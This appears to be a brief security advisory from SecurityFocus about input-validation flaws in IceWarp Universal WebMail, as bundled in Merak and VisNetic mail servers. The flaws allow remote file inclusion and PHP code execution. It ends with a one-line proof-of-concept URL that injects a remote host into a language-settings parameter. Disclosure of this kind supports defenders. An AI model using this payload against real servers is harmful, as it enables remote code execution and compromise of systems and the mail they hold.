13 lines
No EOL
906 B
Text
13 lines
No EOL
906 B
Text
source: https://www.securityfocus.com/bid/16069/info
|
|
|
|
IceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Universal WebMail into their suites.
|
|
|
|
An attacker can exploit these issues to include arbitrary local or remote files containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
|
|
|
|
Additionally, an attacker can exploit these issues to obtain the contents of local files.
|
|
|
|
Merak Mail Server 8.3.0.r and VisNetic MailServer 8.3.0 build 1 are affected by these issues.
|
|
|
|
UPDATE (July 30, 2007): Symantec has confirmed that this issue is being actively exploited in the wild.
|
|
|
|
http://example.com:32000/admin/inc/include.php?language=0&lang_settings[0][1]=http://[host]/ |